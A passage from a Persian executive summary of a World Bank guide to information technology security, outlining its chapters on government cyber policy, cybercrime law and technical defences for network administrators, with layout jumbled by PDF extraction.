ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﻠﻲ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻄﺮﺡ ﻣﻲﻛﻨﺪ ﻭ ﺍﻳﻦ
ﻣﺴﺎﺋﻞ ﺭﺍ ﺩﺭ ﻗﺎﻟﺐ ﺟﻬﺎﻧﻲ ﺑﺮﺭﺳﻲ ﻣﻲﻧﻤﺎﻳﺪ.
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻳﻦ ﻛﺘﺎﺏ ﻋﻨﺎﻭﻳﻦ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻛـﻪ
ﻓﻬﻢ ﺁﻧﻬﺎ ﺩﺭ ﺳﻄﻮﺡ ﺩﻭﻟﺘﻲ ﻻﺯﻡ ﺍﺳﺖ .ﻳﻚ ﺩﻭﻟـﺖ ﻋـﻼﻭﻩ ﺑـﺮ
ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻣﻨـﺎﺑﻊ ﺍﻃﻼﻋـﺎﺗﻲ ﺧـﻮﺩ ،ﺑﺎﻳـﺪ ﻣﺘﻌﻬـﺪ ﺑﺎﺷـﺪ ﻛـﻪ
ﻣﺠﻤﻮﻋــﻪ ﺳﻴﺎﺳــﺘﻬﺎﻳﻲ ﺭﺍ ﺑــﺮﺍﻱ ﺍﻳﻤــﻦﺳــﺎﺧﺘﻦ ﺍﻃﻼﻋــﺎﺕ
ﺯﻳﺮﺳﺎﺧﺘﻲ ﻣﻠﻲ ﺧﻮﺩ ﺗﻨﻈﻴﻢ ﻛﻨﺪ .ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﻧﻘﺶ ﻣﻬﻤـﻲ ﺩﺭ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺍﺭﺩ ،ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺗﻨﺎﻗﻀﻲ ﻧﻴﺰ ﻭﺟﻮﺩ
ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺖ ﻣﻠﻲ ﺑﺎﻳﺪ ﻗـﺎﺩﺭ ﺑـﻪ
ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﻗﻮﺍﻧﻴﻦ ﺿﻌﻴﻒ ﺩﻭﻟﺘـﻲ ﺑـﻴﺶ ﺍﺯ
ﺁﻧﻜﻪ ﺳﻮﺩﻱ ﺩﺭ ﭘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﺿـﺮﺭ ﺑـﻪ ﺑـﺎﺭ ﺧﻮﺍﻫﻨـﺪ ﺁﻭﺭﺩ.
ﻓﻨﺎﻭﺭﻱ ﺑﺴﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﺍﺳﺖ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺪﻳـﺪ
ﺑﻪ ﺩﻟﻴﻞ ﻫﻤﻴﻦ ﺗﻐﻴﻴﺮﺍﺕ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﻨﺪ .ﺩﺭ ﭼﻨـﻴﻦ ﻭﺿـﻌﻴﺘﻲ ﺍﺯ
ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘﻲ ﺑﺮﺍﻱ ﺑﻪ ﺩﺍﻡ ﺍﻧﺪﺍﺧﺘﻦ ﺟﻨﺎﻳﺘﻜﺎﺭﺍﻥ ﻭ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ
Disaster Recovery
16
٢٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﮔﺴﺘﺮﺵ ﺷﻴﻮﻩ ﻫﺎﻱ ﻧﻮﻳﻦ ﺧﻼﻓﻜﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ
ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺗــﻮﺍﺯﻧﻲ ﻣﻨﺎﺳــﺐ ﻣﻴــﺎﻥ ﻣﻌﻴﺎﺭﻫــﺎﻱ ﺗﻘﻨﻴﻨــﻲ ﻭ
ﻏﻴﺮﺗﻘﻨﻴﻨﻲ ﺍﻫﻤﻴﺖ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﺩ .ﻭﺍﺿﺢ ﺍﺳـﺖ ﻛـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﻭﻟﺖ ﺑﺎﻳﺪ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺍﺟﺘﻤﺎﻋﻲ ﻭ ﻓﻨـﻲ
ﺍﻳﻨﺘﺮﻧﺖ ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺑﺎﺷﻨﺪ .ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺩﻭﻟﺘﻬـﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ
ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ﺩﺭ ﻣﺴﺎﺋﻞ ﻓﻨﻲ ﮔﺎﻣﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺩﺍﺭﻧﺪ.
ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺣﺎﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺯﻳﺮ ﺍﺳﺖ:
• ﺷﺒﻜﺔ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺩﻳﮕﺮ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﻛﻪ ﻣﺘﻌﻠﻖ ﺑـﻪ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﻮﺩﻩ ﺍﻣﺎ ﻧﻈﺎﺭﺕ ﺑﺮ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻭﻟـﺖ ﺍﺳـﺖ
)ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﻭﺍﺑﺴﺘﮕﻲ ﻣﺘﻘﺎﺑﻞ ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ(؛
ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣـﺮﻭﺭﻱ ﺑـﺮ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ ﺍﻣﻨﻴـﺖ ﻛـﺎﺭﺑﺮﺍﻥ
ﺧﺎﻧﮕﻲ ،ﺍﻣﻨﻴﺖ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﭘﻴـﺎﺩﻩ ﺳـﺎﺯﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﻛﻼﻥ ﺍﻣﻨﻴﺘـﻲ ﺩﺍﺭﻧـﺪ .ﺑﺨـﺶ ﭘـﻨﺠﻢ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺑـﻪ ﺑﺮﺭﺳـﻲ
ﺗﻬﺪﻳﺪﺍﺕ ﻭﻳﮋﺓ ﺍﻣﻨﻴﺘﻲ ﻣﻲ ﭘﺮﺩﺍﺯﺩ ﻛﻪ ﺷﺎﻣﻞ ﺭﻭﺷـﻬﺎﻱ ﻣﺨﺘﻠـﻒ
ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﺭﻭﺷـﻬﺎﻱ ﻧﻈـﺎﺭﺕ ﺑـﺮ ﺗﺮﺍﻓﻴـﻚ
ﺷﺒﻜﻪﻫﺎﻱ ﻣﻬﻢ ،ﺍﻟﮕﻮﻫﺎﻱ ﺳـﺮﺁﻣﺪﻱ ١٧ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﻳـﻦ
ﺳﻴﺴﺘﻤﻬﺎ ،ﻭ ﺭﻭﺵ ﻣﻨﺎﺳﺐ ﻛﺎﺭ ﺑـﺎ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺯﻣـﺎﻥ
ﺑﺤﺮﺍﻥ ﻣﻲﺑﺎﺷﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ ﺣﺎﻭﻱ ﻣﻄﺎﻟﺐ ﺯﻳﺮ ﺍﺳﺖ:
• ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺳﻴﺴﺘﻢ؛
•
ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺨﺘﻠــﻒ ﺍﻣﻨﻴــﺖ ﻓﻨــﺎﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ ﺳــﻮﻱ
ﻋﻮﺍﻣﻞ ﻣﺤﻴﻄـﻲ ﺑـﺮﺍﻱ ﺧﺮﺍﺑﻜـﺎﺭﻱ ﻭ ﺩﺯﺩﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ
ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ؛
•
ﻧﻘﺶ ﻛﻠﻲ ﺩﻭﻟﺖ ﻭ ﻭﻇﺎﻳﻒ ﺁﻥ ﺩﺭ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻋﻤﻮﻣﻲ ،ﺧﺼﻮﺻﻲ ،ﻭ ﻏﻴﺮﺍﻧﺘﻔﺎﻋﻲ؛
•
ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺑـﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ
ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ؛
•
ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﻣﻘﺎﺑﻠــﻪ ﺑــﺎ ﺍﻓ ـﺸﺎﻱ
ﻏﻴﺮﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎ ﻋﻨﺎﻭﻳﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ
)ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ
١٩
ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﺁﻧﻬﺎ( ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎ )ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﻲﻧﻘـﺺ ﻭ ﺻـﺤﻴﺢ ﺑـﺎﻗﻲﺧﻮﺍﻫﻨـﺪ ﻣﺎﻧـﺪ(
ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ؛
•
ﻣﻔﺎﻫﻴﻢ ﺳﻨﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑـﻪ ﻗﺎﻟـﺐ ﻗـﻮﺍﻧﻴﻦ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻣﻨﺘﻘﻞ ﺷﺪﻩﺍﻧﺪ؛
•
ﻗﻮﺍﻧﻴﻦ ،ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺑﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻋﺮﺻﺔ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ ،ﺩﺍﺩﻩﻫـﺎﻱ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺨﺼﻲ ،ﻭ ﭼﺎﺭﭼﻮﺑﻬـﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ؛ ﻭ
•
ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺷﻨﺎﺳــﺎﻳﻲ ،٢٠ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ،ﻭ ﺗﺄﻳﻴــﺪ
ﺍﻋﺘﺒﺎﺭ ٢١ﻛﺎﺭﺑﺮﺍﻥ؛
ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳـﺞ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ
ﺧـــﺪﻣﺎﺕ ﺍﻃﻼﻋـــﺎﺗﻲ ﺑﻜـــﺎﺭ ﻣـــﻲﺭﻭﻧـــﺪ ﻭ ﺗﻨﻈﻴﻤـــﺎﺕ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ٢٢ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺴﺎﺋﻞ؛
•
ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﻗـﻮﺍﻧﻴﻦ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﻭ
ﻣﺮﺍﺟﻊ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻣﻌﺘﺒﺮ؛
•
ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻘﻮﻗﻲ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻛـﻼﻥ
ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨـﺪ .ﺑﺨـﺶ ﭘـﻨﺠﻢ ﻧﮕـﺎﻫﻲ ﻋﻤﻴﻘﺘـﺮ ﺑـﻪ ﻟـﻮﺍﺯﻡ ﻭ
ﺭﻭﺍﻟﻬﺎﻱ ﻓﻨﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ
ﺩﺍﺭﺩ.
ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺯ ﺑﻌﺪ ﺳﺨﺖ ﺍﻓـﺰﺍﺭﻱ )ﻣﻮﺩﻣﻬـﺎ ،ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ ٢٣ﻭ
•
١٨
ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭘﻨﺠﻢ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﺑﺨﺶ ﭘﻨﺠﻢ ﺑﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺷﺒﻜﻪ ﻭ ﺳﻴﺴﺘﻢ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ ﺗـﺎ
ﺑﺘﻮﺍﻧﻨﺪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻛﺎﺭﺁﻣﺪﺗﺮﻱ ﺍﻧﺠـﺎﻡ ﺩﻫﻨـﺪ .ﺍﻳـﻦ
ﺑﺨﺶ ﻣﺴﺎﺋﻠﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎﻳـﺪ ﺩﺭ ﺳـﻄﻮﺡ ﻓﻨـﻲ ﻭ
ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻂ ﺍﻣﻨﻴﺘﻲ ﭼﮕﻮﻧﻪ ﻧﻘـﺾ
ﻣﺪﻳﺮﻳﺘﻲ ﺩﺭﻙ ﺷﻮﻧﺪ؛ ﻣﺜ ﹰ
ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻛﺪﺍﻣﻨـﺪ .ﺑﺨـﺸﻬﺎﻱ
ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ( ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ )ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﻣﻮﺟـﻮﺩ
ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ؛ ﻣﺜﻞ (TCP/IP؛
•
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ
ﻛﺎﺭﻱ ٢٤ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ
) ٢٥(DoSﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ ٢٦ﻣﻲﮔﻮﻳﻨﺪ.
Best Practices
Data Confidentiality
Data Integrity
Identification
Authorization
Servers
Routers
17
18
19
20
21
22
23
٢٣
ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ
•
ﭼﮕــﻮﻧﮕﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣﻤﻴــﺰﻱ ٢٧ﻭ ﻭﺭﻭﺩ ﺑــﻪ
ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮ
ﻭ ﻳﺎﻓﺘﻦ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ ﺭﻭﻱ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ
ﺷﺪﻩﺍﻧﺪ.
•
ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨﻲ ﻭﻳـﮋﻩ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ ،Unix
،Windows ،Linuxﻭ Macintosh
ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻮﺿـﻮﻉ ،ﭼﻨـﺪﻳﻦ ﺿـﻤﻴﻤﻪ ﻧﻴـﺰ ﺩﺭ
ﺍﻧﺘﻬﺎﻱ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ.
ﭘﻴﻮﺳﺖ ۱ﺣﺎﻭﻱ ﻭﺍﮊﻩﻧﺎﻣﻪﺍﻱ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺠﻲ ﺍﺳـﺖ ﻛـﻪ
ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻣﻲﮔﻴﺮﻧﺪ ،ﻭ ﭘﻴﻮﺳﺘﻬﺎﻱ ۲ﺗﺎ ۵ﻧﻴﺰ ﻣﺮﺍﺟﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴﻪ
ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﻣﻌﺮﻓﻲ ﻧﻤﻮﺩﻩﺍﻧﺪ .ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﻣـﺴﺘﻨﺪﺍﺕ
ﭼﺎﭘﻲ ،ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭﺑﺎﺭﺓ
ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻫﺴﺘﻨﺪ .ﺗﻮﺻـﻴﻪ ﻣـﻲﺷـﻮﺩ
ﺗﻤﺎﻣﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺑﻪ ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﻭ ﻣﺂﺧﺬ ﺫﻛـﺮ
ﺷﺪﻩﺍﻧﺪ ﺳﺮﻱ ﺑﺰﻧﻨﺪ.
ﮔﺎﻣﻬﺎﻱ ﺁﺗﻲ ﻭ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ
ﻣــﻲﻛﻨــﺪ .ﺍﻳــﻦ ﻛﺘــﺎﺏ ﻫﻤﭽﻨــﻴﻦ ﺷــﺎﻣﻞ ﻣﺮﺍﺟــﻊ ﻓﺮﺍﻭﺍﻧــﻲ ﺍﺯ
ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ
ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ ﻭ ﻟﺬﺍ ﺁﻣﻮﺧﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ ،ﮔـﺎﻣﻲ ﺩﺭ ﺟﻬـﺖ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﻟﻴﺪ ﻇﺮﻓﻴﺖ ﺩﺭ ﺳﻄﺢ ﻣﺤﻠﻲ ﺩﺭ ﺟﻬـﺎﻥ ﺭﻭ
ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﻣﺮﻭﺯ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ .ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻂ ﺑﺎﻧـﻚ
ﺟﻬﺎﻧﻲ ﻣﻨﺘﺸﺮ ﺷـﺪﻩ ﻭ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﻛـﻪ
ﺣــﺎﻭﻱ ﻣﻄﺎﻟــﺐ ﺟﺪﻳــﺪ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺍﺳــﺖ ﻧﻴــﺰ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ
ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﺍﻭﻟـﻴﻦ ﻭﻳـﺮﺍﻳﺶ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ
ﺍﺟﻼﺱ ﺟﻬﺎﻧﻲ ﺳـﺮﺍﻥ ﺟﺎﻣﻌـﺔ ﺍﻃﻼﻋـﺎﺗﻲ ) (WSISﺩﺭ ﮊﻧـﻮ ﺩﺭ
ﺩﺳﺎﻣﺒﺮ ۲۰۰۳ﻣﻴﻼﺩﻱ ﺍﺭﺍﺋﻪ ﺷﺪ.
ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻃﺒﻖ ﻣﻨﺸﻮﺭ ﺣﻖ ﺗﻜﺜﻴﺮ ﺟﻬﺎﻧﻲ ٢٨ﻣﺎﻳﻞ ﺑـﻪ ﺣﻔـﻆ
ﻗــﺎﻧﻮﻥ ﺣــﻖ ﺗﻜﺜﻴــﺮ ﺍﻳــﻦ ﻛﺘــﺎﺏ ﺍﺳــﺖ ﻭ ﺑــﻪ ﻫــﻴﭻ ﻋﻨــﻮﺍﻥ
ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺗﺤﻘﻴﻖ ،ﺁﻣﻮﺯﺵ ﻭ ﺩﻳﮕﺮ
ﺍﻫﺪﺍﻑ ﺟﺰ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ﻋـﻀﻮ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ
ﻣﺠﺎﺯ ﻧﻤﻲﺑﺎﺷﺪ .ﻳﺎﻓﺘﻪﻫﺎ ،ﺗﻔﺎﺳﻴﺮ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ
ﻫﻤﮕﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻧﺒﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺑﺎﻧـﻚ
ﺟﻬﺎﻧﻲ ،ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻥ ،ﺍﻋﻀﺎﻱ ﻫﻴـﺄﺕ ﻣـﺪﻳﺮﻩ ﻭ ﻳـﺎ
ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﻧﺴﺒﺖ ﺩﺍﺩ.
ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ
ﻛﻪ ﺗﺄﺛﻴﺮ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺩﺭ ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ ،ﺑﻬﺪﺍﺷﺖ ،ﺗﺠـﺎﺭﺕ ﻭ
